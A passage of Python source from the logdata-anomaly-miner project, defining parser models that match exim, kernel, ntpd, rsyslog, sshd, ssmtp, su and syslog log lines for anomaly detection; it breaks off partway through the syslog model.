FixedDataModelElement("s0", b">" + size_str), size, FixedDataModelElement("s1", host_str), host, FixedDataModelElement("s2", b" ["), host_ip, OptionalMatchModelElement("optional", SequenceModelElement("seq", [ FixedDataModelElement("to", b".."), DecimalIntegerValueModelElement("upper_ip") ])), FixedDataModelElement("status_code", b"]" + status_code550), FixedDataModelElement("msg", b" \"REJECTED - Bad HELO - Host impersonating ["), DelimitedDataModelElement("original_host", b"]"), FixedDataModelElement("s3", b"]\"") ]), SequenceModelElement("domain_not_exists", [ FixedDataModelElement("msg", smtp_error_from_remote), DelimitedDataModelElement("mail_from", b">"), FixedDataModelElement("s0", b">" + host_str), host, FixedDataModelElement("s1", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code553), FixedDataModelElement("msg", b"sorry, your domain does not exists.") ]), SequenceModelElement("rejected_due_to_spam_content", [ DateTimeModelElement("time", b"[%H:%M:%S"), FixedDataModelElement("hosts", b" hosts"), DecimalIntegerValueModelElement("hosts_number"), FixedDataModelElement("s0", b" "), RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ dtme, FixedDataModelElement("s1", b" "), msg_id, FixedDataModelElement("s2", b" <= <>" + r_str), r, FixedDataModelElement("s3", u_str), u, FixedDataModelElement("s4", p_str), p, FixedDataModelElement("s5", s_str), s, FixedDataModelElement("s6", t_str + b'"'), DelimitedDataModelElement("t", b'"'), FixedDataModelElement("s7", b'" for '), mail_from, FixedDataModelElement("s8", b" "), dtme, FixedDataModelElement("s9", b" cwd="), DelimitedDataModelElement("cwd", b" "), FixedDataModelElement("s10", b" "), DecimalIntegerValueModelElement("args_num"), FixedDataModelElement("s11", b" args: "), RepeatedElementDataModelElement("rep", FirstMatchModelElement("fm", [ SequenceModelElement("seq", [ dtme, FixedDataModelElement("s12", b" "), msg_id, FixedDataModelElement("s13", b" ** "), mail_from, FixedDataModelElement("s14", r_str), r, FixedDataModelElement("s15", t_str), DelimitedDataModelElement("t", b":"), FixedDataModelElement("msg", b": SMTP error from remote mail server after end of data" + host_str), DelimitedDataModelElement("domain", b" "), FixedDataModelElement("s16", b" ["), host_ip, FixedDataModelElement("status_code", b"]" + status_code554), FixedDataModelElement("msg", b"rejected due to spam content") ]), # this is problematic as the number of arguments is variable! SequenceModelElement("arg_seq", [ DelimitedDataModelElement("arg", b" "), FixedDataModelElement("s17", b" ") ]) ])) ]), # this is problematic as the number of hosts is variable! SequenceModelElement("host_seq", [ host, FixedDataModelElement("s8", b" ") ]) ])) ]), ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/KernelMsgParsingModel.py000066400000000000000000000035541500476301700332520ustar00rootroot00000000000000"""This module defines a parser for kernelmsg.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse messages from kernel logging.""" type_children = [ SequenceModelElement("ipv4-martian", [ FixedDataModelElement("s0", b"IPv4: martian "), FixedWordlistDataModelElement("direction", [b"source", b"destination"]), FixedDataModelElement("s1", b" "), IpAddressDataModelElement("destination"), FixedDataModelElement("s2", b" from "), IpAddressDataModelElement("source"), FixedDataModelElement("s3", b", on dev "), AnyByteDataModelElement("interface")]), SequenceModelElement("net-llheader", [ FixedDataModelElement("s0", b"ll header: "), AnyByteDataModelElement("data") ]), AnyByteDataModelElement("unparsed") ] model = SequenceModelElement("kernel", [ FixedDataModelElement("sname", b"kernel: "), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("opt_s0", b"]"), DelimitedDataModelElement("timestamp", b"]"), FixedDataModelElement("opt_s1", b"] "), ])), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/NtpParsingModel.py000066400000000000000000000121261500476301700321170ustar00rootroot00000000000000"""This module defines the parsing model for ntpd logs.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalFloatValueModelElement import DecimalFloatValueModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Get the model.""" interface_name_model = VariableByteDataModelElement("interface", b"0123456789abcdefghijklmnopqrstuvwxyz.") dtme = DateTimeModelElement("expire-date", b"%Y-%m-%dT%H:%M:%SZ") type_children = [ SequenceModelElement("exit", [ FixedDataModelElement("s0", b"ntpd exiting on signal "), DecimalIntegerValueModelElement("signal") ]), SequenceModelElement("listen-drop", [ FixedDataModelElement("s0", b"Listen and drop on "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" "), interface_name_model, FixedDataModelElement("s2", b" "), FirstMatchModelElement("address", [ IpAddressDataModelElement("ipv4"), DelimitedDataModelElement("ipv6", b" "), FixedDataModelElement("ipv6_missing", b"[::]") ]), FirstMatchModelElement("udp", [ FixedDataModelElement("s3", b" UDP 123"), FixedDataModelElement("s3", b":123")]) ]), SequenceModelElement("listen-normal", [ FixedDataModelElement("s0", b"Listen normally on "), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" "), interface_name_model, FixedDataModelElement("s2", b" "), IpAddressDataModelElement("ip"), FirstMatchModelElement("msg", [ FixedDataModelElement("port-new", b":123"), FixedDataModelElement("port-old", b" UDP 123") ]) ]), SequenceModelElement("listen-routing", [ FixedDataModelElement("s0", b"Listening on routing socket on fd #"), DecimalIntegerValueModelElement("fd"), FixedDataModelElement("s1", b" for interface updates") ]), SequenceModelElement("soliciting-pool", [ FixedDataModelElement("s0", b"Soliciting pool server "), IpAddressDataModelElement("pool-server-ip") ]), SequenceModelElement("starting", [ FixedDataModelElement("s0", b"ntpd "), DelimitedDataModelElement("version", b" "), FixedDataModelElement("s1", b" (1): Starting") ]), SequenceModelElement("no-root", [ FixedDataModelElement("s0", b"must be run as root, not uid "), DecimalIntegerValueModelElement("uid") ]), SequenceModelElement("leapsecond-file", [ FixedDataModelElement("s0", b"leapsecond file ('"), DelimitedDataModelElement("file", b"'"), FixedDataModelElement("s1", b"'): "), FirstMatchModelElement("first", [ FixedDataModelElement("msg", b"good hash signature"), SequenceModelElement("seq", [ FixedDataModelElement("s2", b"loaded, expire="), dtme, FixedDataModelElement("s3", b" last="), dtme, FixedDataModelElement("s4", b" ofs="), DecimalIntegerValueModelElement("ofs") ]) ]) ]), FixedDataModelElement("unable-to-bind", b"unable to bind to wildcard address :: - another process may be running - EXITING"), FixedDataModelElement("new-interfaces", b"new interface(s) found: waking up resolver"), FixedDataModelElement("ntp-io", b"ntp_io: estimated max descriptors: 1024, initial socket boundary: 16"), FixedDataModelElement("peers-refreshed", b"peers refreshed"), FixedDataModelElement("log-file", b"logging to file /var/log/ntplog"), FixedDataModelElement("command-line", b"Command line: ntpd"), SequenceModelElement("precision", [ FixedDataModelElement("s0", b"proto: precision = "), DecimalFloatValueModelElement("precision"), FixedDataModelElement("s1", b" usec ("), DecimalIntegerValueModelElement("usec", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL), FixedDataModelElement("s2", b")") ])] model = SequenceModelElement("ntpd", [ FixedDataModelElement("sname", b"ntpd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/RsyslogParsingModel.py000066400000000000000000000075501500476301700330250ustar00rootroot00000000000000"""This module defines a parser for rsyslog.""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement def get_model(): """Return a model to parse a su session information message after any standard logging preamble, e.g. from syslog.""" type_children = [ SequenceModelElement("gidchange", [ FixedDataModelElement("s0", b"rsyslogd's groupid changed to "), DecimalIntegerValueModelElement("gid") ]), SequenceModelElement("statechange", [ FixedDataModelElement("s0", b'[origin software="rsyslogd" swVersion="'), DelimitedDataModelElement("version", b'"'), FixedDataModelElement("s1", b'" x-pid="'), DecimalIntegerValueModelElement("pid"), FirstMatchModelElement("fm", [ FixedDataModelElement("s2", b'" x-info="https://www.rsyslog.com"] '), FixedDataModelElement("s2", b'" x-info="http://www.rsyslog.com"] ') ]), FirstMatchModelElement("type", [ FixedDataModelElement("HUPed", b"rsyslogd was HUPed"), FixedDataModelElement("start", b"start") ]) ]), SequenceModelElement("uidchange", [ FixedDataModelElement("s0", b"rsyslogd's userid changed to "), DecimalIntegerValueModelElement("uid") ]), SequenceModelElement("action", [ FixedDataModelElement("s0", b"action '"), DelimitedDataModelElement("action", b"'"), FirstMatchModelElement("fm", [ SequenceModelElement("resumed", [ FixedDataModelElement("s1", b"' resumed (module '"), DelimitedDataModelElement("module", b"'"), FixedDataModelElement("s2", b"') [try http://www.rsyslog.com/e/"), DecimalIntegerValueModelElement("number"), FixedDataModelElement("s3", b" ]") ]), SequenceModelElement("suspended", [ FixedDataModelElement("s1", b"' suspended, next retry is "), DelimitedDataModelElement("dayname", b" "), FixedDataModelElement("s2", b" "), DateTimeModelElement("dtme", b"%b %d %H:%M:%S %Y"), FixedDataModelElement("s2", b" [try http://www.rsyslog.com/e/"), DecimalIntegerValueModelElement("number"), FixedDataModelElement("s3", b" ]") ]) ]), ]), SequenceModelElement("cmd", [ FixedDataModelElement("s0", b"command '"), DelimitedDataModelElement("command", b"'"), FixedDataModelElement( "s1", b"' is currently not permitted - did you already set it via a RainerScript command (v6+ config)? ["), DelimitedDataModelElement("version", b"]", consume_delimiter=True) ]) ] model = SequenceModelElement("rsyslog", [ FixedDataModelElement("sname", b"rsyslogd"), OptionalMatchModelElement("opt", FirstMatchModelElement("fm", [ DecimalIntegerValueModelElement("number"), SequenceModelElement("seq", [ FixedDataModelElement("s0", b"-"), DecimalIntegerValueModelElement("number") ]) ])), FixedDataModelElement("s0", b": "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SshdParsingModel.py000066400000000000000000000434251500476301700322650ustar00rootroot00000000000000"""This module provides support for parsing of sshd messages.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a sshd information message after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") from_str = b" from " port = b" port " preauth = b" [preauth]" type_children = [ SequenceModelElement("accepted key", [ FixedDataModelElement("s0", b"Accepted publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2: "), DelimitedDataModelElement("asym-algorithm", b" ", consume_delimiter=True), VariableByteDataModelElement("fingerprint", b"0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/:"), OptionalMatchModelElement("opt", SequenceModelElement("seq", [ FixedDataModelElement("s4", b" ID "), DelimitedDataModelElement("id", b" "), FixedDataModelElement("s5", b" (serial "), DecimalIntegerValueModelElement("serial"), FixedDataModelElement("s6", b") CA "), AnyByteDataModelElement("algorithm_details") ])) ]), SequenceModelElement("btmp-perm", [ FixedDataModelElement("s0", b"Excess permission or bad ownership on file /var/log/btmp") ]), SequenceModelElement("close-sess", [ FixedDataModelElement("s0", b"Close session: user "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" id "), DecimalIntegerValueModelElement("userid") ]), SequenceModelElement("closing", [ FixedDataModelElement("s0", b"Closing connection to "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("closed", [ FixedDataModelElement("s0", b"Connection closed by "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("clientip"), SequenceModelElement("seq", [ FixedWordlistDataModelElement("user-type", [b"authenticating", b"invalid"]), FixedDataModelElement("s1", b" user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("ip"), IpAddressDataModelElement("ipv6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s4", b" [preauth]") ]) ]) ]), SequenceModelElement("connect", [ FixedDataModelElement("s0", b"Connection from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b" on "), IpAddressDataModelElement("serverip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("sport") ]), SequenceModelElement("disconnectreq", [ FixedDataModelElement("s0", b"Received disconnect from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b":"), DecimalIntegerValueModelElement("session"), FixedDataModelElement("s3", b": "), FixedWordlistDataModelElement("reason", [b"disconnected by user"]) ]), SequenceModelElement("disconnected", [ FixedDataModelElement("s0", b"Disconnected from "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port") ]), FixedDataModelElement("error-bind", b"error: bind: Cannot assign requested address"), SequenceModelElement("error-max-auth", [ FixedDataModelElement("s0", b"error: maximum authentication attempts exceeded for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), FixedDataModelElement("error-cert-exp", b"error: Certificate invalid: expired"), FixedDataModelElement("error-cert-not-yet-valid", b"error: Certificate invalid: not yet valid"), FixedDataModelElement("error-cert-not-listed-principal", b"error: Certificate invalid: name is not a listed principal"), FixedDataModelElement("error-refused-by-options", b"error: Refused by certificate options"), SequenceModelElement("error-channel-setup", [ FixedDataModelElement("s0", b"error: channel_setup_fwd_listener: cannot listen to port: "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("error-auth-key", [ FixedDataModelElement("s0", b"error: Authentication key "), DelimitedDataModelElement("asym-algorithm", b" "), FixedDataModelElement("s1", b" "), DelimitedDataModelElement("hash", b" "), FixedDataModelElement("s2", b" revoked by file "), AnyByteDataModelElement("file") ]), SequenceModelElement("error-load-key", [ FixedDataModelElement("s0", b"error: Could not load host key: "), AnyByteDataModelElement("file") ]), SequenceModelElement("ident-missing", [ FixedDataModelElement("s0", b"Did not receive identification string from "), IpAddressDataModelElement("clientip") ]), SequenceModelElement("invalid-user", [ FixedDataModelElement("s0", b"Invalid user "), DelimitedDataModelElement("user", from_str), FixedDataModelElement("s1", from_str), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("invalid-user-auth-req", [ FixedDataModelElement("s0", b"input_userauth_request: invalid user "), DelimitedDataModelElement("user", preauth), FixedDataModelElement("s1", preauth) ]), SequenceModelElement("postppk", [ FixedDataModelElement("s0", b"Postponed publickey for "), user_name_model, FixedDataModelElement("s1", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s2", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b" ssh2 [preauth]") ]), SequenceModelElement("readerr", [ FixedDataModelElement("s0", b"Read error from remote host "), IpAddressDataModelElement("clientip"), FixedDataModelElement("s1", b": Connection timed out") ]), SequenceModelElement("disconnect", [ FixedDataModelElement("s0", b"Received disconnect from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s1", b": 11: "), FirstMatchModelElement("reason", [ FixedDataModelElement("disconnected", b"disconnected by user"), SequenceModelElement("remotemsg", [ DelimitedDataModelElement("msg", preauth), FixedDataModelElement("s0", preauth) ]) ]) ]), SequenceModelElement("signal", [ FixedDataModelElement("s0", b"Received signal "), DecimalIntegerValueModelElement("signal"), FixedDataModelElement("s1", b"; terminating.") ]), SequenceModelElement("server", [ FixedDataModelElement("s0", b"Server listening on "), DelimitedDataModelElement("serverip", b" "), FixedDataModelElement("s1", port), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b".") ]), SequenceModelElement("oom-adjust", [ FixedDataModelElement("s0", b"Set /proc/self/oom_score_adj "), OptionalMatchModelElement("from", FixedDataModelElement("default", b"from 0 ")), FixedDataModelElement("s1", b"to "), DecimalIntegerValueModelElement("newval", value_sign_type=DecimalIntegerValueModelElement.SIGN_TYPE_OPTIONAL) ]), SequenceModelElement("session-start", [ FixedDataModelElement("s0", b"Starting session: "), FirstMatchModelElement("sess-info", [ SequenceModelElement("shell", [ FixedDataModelElement("s0", b"shell on "), DelimitedDataModelElement("terminal", b" ") ]), SequenceModelElement("subsystem", [ FixedDataModelElement("s0", b"subsystem \"sftp\"") ]), SequenceModelElement("forced-command", [ FixedDataModelElement("s0", b"forced-command (key-option) \""), DelimitedDataModelElement("command", b"\" for "), FixedDataModelElement("s1", b"\"") ]) ]), FixedDataModelElement("s1", b" for "), user_name_model, FixedDataModelElement("s2", from_str), IpAddressDataModelElement("clientip"), FixedDataModelElement("s3", port), DecimalIntegerValueModelElement("port"), OptionalMatchModelElement("idinfo", SequenceModelElement("idinfo", [ FixedDataModelElement("s0", b" id "), DecimalIntegerValueModelElement("id") ])) ]), SequenceModelElement("transferred", [ FixedDataModelElement("s0", b"Transferred: sent "), DecimalIntegerValueModelElement("sent"), FixedDataModelElement("s1", b", received "), DecimalIntegerValueModelElement("received"), FixedDataModelElement("s1", b" bytes")]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(sshd:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", FixedDataModelElement("default", b" by (uid=0)")) ]), SequenceModelElement("child", [ FixedDataModelElement("s0", b"User child is on pid "), DecimalIntegerValueModelElement("pid") ]), SequenceModelElement("failed/accept", [ FixedWordlistDataModelElement("s0", [b"Failed ", b"Accepted "]), FixedWordlistDataModelElement("type", [b"password", b"none", b"publickey"]), FixedDataModelElement("s1", b" for "), OptionalMatchModelElement("opt", FixedDataModelElement("invalid", b"invalid user ")), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s2", b" from "), FirstMatchModelElement("fm", [ IpAddressDataModelElement("from_ip"), IpAddressDataModelElement("from_ip_v6", ipv6=True) ]), FixedDataModelElement("s3", b" port "), DecimalIntegerValueModelElement("port"), AnyByteDataModelElement("service") ]), SequenceModelElement("disconnecting", [ FixedDataModelElement("s0", b"Disconnecting "), FixedWordlistDataModelElement("type", [b"authenticating", b"invalid"]), FixedDataModelElement("s1", b" user "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" "), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s3", b": Too many authentication failures [preauth]") ]), SequenceModelElement("fatal", [ FixedDataModelElement("s0", b"fatal: Timeout before authentication for "), IpAddressDataModelElement("ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port") ]), SequenceModelElement("cert-auth", [ FixedDataModelElement("s0", b"cert: Authentication tried for "), DelimitedDataModelElement("user", b" "), FixedDataModelElement("s1", b" with valid certificate but not from a permitted source address ("), IpAddressDataModelElement("ip"), FixedDataModelElement("s2", b")."), ]), SequenceModelElement("change-root-dir", [ FixedDataModelElement("s0", b"Changed root directory to \""), DelimitedDataModelElement("root-dir", b"\""), FixedDataModelElement("s1", b"\"") ]), FixedDataModelElement("subsystem-request", b"subsystem request for sftp"), SequenceModelElement("conn-write-poll", [ FixedDataModelElement("s0", b"packet_write_poll: Connection from "), IpAddressDataModelElement("from_ip"), FixedDataModelElement("s1", b" port "), DecimalIntegerValueModelElement("port"), FixedDataModelElement("s2", b": Host is down") ]), SequenceModelElement("debug", [ FixedDataModelElement("s0", b"debug"), DecimalIntegerValueModelElement("debug-num"), FixedDataModelElement("s1", b": "), FirstMatchModelElement("fm", [ SequenceModelElement("seq1", [ FixedDataModelElement("s2", b"Got "), DecimalIntegerValueModelElement("num1"), FixedDataModelElement("s3", b"/"), DecimalIntegerValueModelElement("num2"), FixedDataModelElement("s4", b" for keepalive") ]), SequenceModelElement("seq2", [ FixedDataModelElement("s2", b"channel "), DecimalIntegerValueModelElement("channel-num"), FixedDataModelElement("s3", b": request "), DelimitedDataModelElement("mail", b" "), FixedDataModelElement("s4", b" confirm "), DecimalIntegerValueModelElement("num") ]), SequenceModelElement("seq3", [ FixedDataModelElement("s2", b"send packet: type "), DecimalIntegerValueModelElement("packet-type") ]), SequenceModelElement("seq4", [ FixedDataModelElement("s2", b"receive packet: type "), DecimalIntegerValueModelElement("packet-type") ]), FixedDataModelElement("do-cleanup", b"do_cleanup"), SequenceModelElement("seq5", [ FixedDataModelElement("s2", b"session_pty_cleanup: session "), DecimalIntegerValueModelElement("sess-num"), FixedDataModelElement("s3", b" release "), AnyByteDataModelElement("file") ]) ]) ]), SequenceModelElement("pam_succeed_if", [ FixedDataModelElement("s0", b"pam_succeed_if(sshd:auth): requirement \"uid >= "), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s1", b"\" not met by user \""), DelimitedDataModelElement("user", b"\""), FixedDataModelElement("s2", b"\"") ]), ] model = SequenceModelElement("sshd", [ FixedDataModelElement("sname", b"sshd["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SsmtpParsingModel.py000066400000000000000000000032041500476301700324610ustar00rootroot00000000000000"""This module defines a parser for ssmtp.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement def get_model(): """Return the model.""" type_children = [ SequenceModelElement("sent", [ FixedDataModelElement("s0", b"Sent mail for "), DelimitedDataModelElement("to-addr", b" ("), FixedDataModelElement("s1", b" ("), DelimitedDataModelElement("status", b") uid="), FixedDataModelElement("s2", b") uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s3", b" username="), DelimitedDataModelElement("username", b" outbytes="), FixedDataModelElement("s4", b" outbytes="), DecimalIntegerValueModelElement("bytes") ]), SequenceModelElement("sent", [ DelimitedDataModelElement("program", b" "), FixedDataModelElement("s0", b" sent mail for "), AnyByteDataModelElement("user") ]) ] model = SequenceModelElement("ssmtp", [ FixedDataModelElement("sname", b"sSMTP["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SuSessionParsingModel.py000066400000000000000000000046441500476301700333170ustar00rootroot00000000000000"""This module defines a parser for susession.""" from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(user_name_model=None): """Return a model to parse a su session information message after any standard logging preamble, e.g. from syslog.""" if user_name_model is None: user_name_model = VariableByteDataModelElement("user", b"0123456789abcdefghijklmnopqrstuvwxyz.-") srcuser_name_model = VariableByteDataModelElement("srcuser", b"0123456789abcdefghijklmnopqrstuvwxyz.-") type_children = [ SequenceModelElement("su-good", [ FixedDataModelElement("s0", b"Successful su for "), user_name_model, FixedDataModelElement("s1", b" by "), srcuser_name_model]), SequenceModelElement("su-good", [ FixedDataModelElement("s0", b"+ "), DelimitedDataModelElement("terminal", b" "), FixedDataModelElement("s1", b" "), srcuser_name_model, FixedDataModelElement("s2", b":"), user_name_model ]), SequenceModelElement("pam", [ FixedDataModelElement("s0", b"pam_unix(su:session): session "), FixedWordlistDataModelElement("change", [b"opened", b"closed"]), FixedDataModelElement("s1", b" for user "), user_name_model, OptionalMatchModelElement("openby", SequenceModelElement("userinfo", [ FixedDataModelElement("s0", b" by (uid="), DecimalIntegerValueModelElement("uid"), FixedDataModelElement("s1", b")") ])) ]) ] model = SequenceModelElement("su", [ FixedDataModelElement("sname", b"su["), DecimalIntegerValueModelElement("pid"), FixedDataModelElement("s0", b"]: "), FirstMatchModelElement("msg", type_children) ]) return model logdata-anomaly-miner-2.8.0/source/root/etc/aminer/conf-available/generic/SyslogParsingModel.py000066400000000000000000001623501500476301700326430ustar00rootroot00000000000000"""This module defines a generated parser model.""" from aminer.parsing.AnyByteDataModelElement import AnyByteDataModelElement from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement from aminer.parsing.HexStringModelElement import HexStringModelElement def get_model(): """Return a model to parse Syslogs from the AIT-LDS.""" alphabet = b"!'#$%&\"()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]" user_info = SequenceModelElement("user_info", [ FixedDataModelElement("user_str", b"user=<"), OptionalMatchModelElement( "user", DelimitedDataModelElement("user", b">") ), FixedDataModelElement("method_str", b">"), OptionalMatchModelElement( "method", SequenceModelElement("method", [ FixedDataModelElement("method_str", b", method="), DelimitedDataModelElement("method", b","), ]) ), FixedDataModelElement("rip_str", b", rip="), IpAddressDataModelElement("rip"), FixedDataModelElement("lip_str", b", lip="), IpAddressDataModelElement("lip"), OptionalMatchModelElement( "mpid", SequenceModelElement("mpid", [ FixedDataModelElement("mpid_str", b", mpid="), DecimalIntegerValueModelElement("mpid"), ]) ), OptionalMatchModelElement( "secured", FixedDataModelElement("secured_str", b", secured") ), OptionalMatchModelElement( "tls", FixedDataModelElement("tls_str", b", TLS") ), OptionalMatchModelElement( "handshaking", SequenceModelElement("seq", [ FixedDataModelElement("handshaking_str", b" handshaking:"), DelimitedDataModelElement("msg", b", session=<") ]) ), FixedDataModelElement("session_str", b", session=<"), DelimitedDataModelElement("session", b">"), FixedDataModelElement("bracket_str", b">"), ]) model = SequenceModelElement("model", [ DateTimeModelElement("time", b"%b %d %H:%M:%S"), FixedDataModelElement("sp1", b" "), DelimitedDataModelElement("host", b" "), FirstMatchModelElement("service", [ SequenceModelElement("dovecot", [ FixedDataModelElement("dovecot_str", b" dovecot: "), FirstMatchModelElement("imap", [ SequenceModelElement("imap", [ FixedDataModelElement("imap_str", b"imap("), DelimitedDataModelElement("user", b")"), FixedDataModelElement("bracket_str", b"): "), FirstMatchModelElement("message", [ SequenceModelElement("logout", [ FixedDataModelElement("logout_str", b"Logged out in="), DecimalIntegerValueModelElement("in"), FixedDataModelElement("out_str", b" out="), DecimalIntegerValueModelElement("out") ]), SequenceModelElement("err_mail", [ FixedDataModelElement("mail_str", b"Error: Failed to 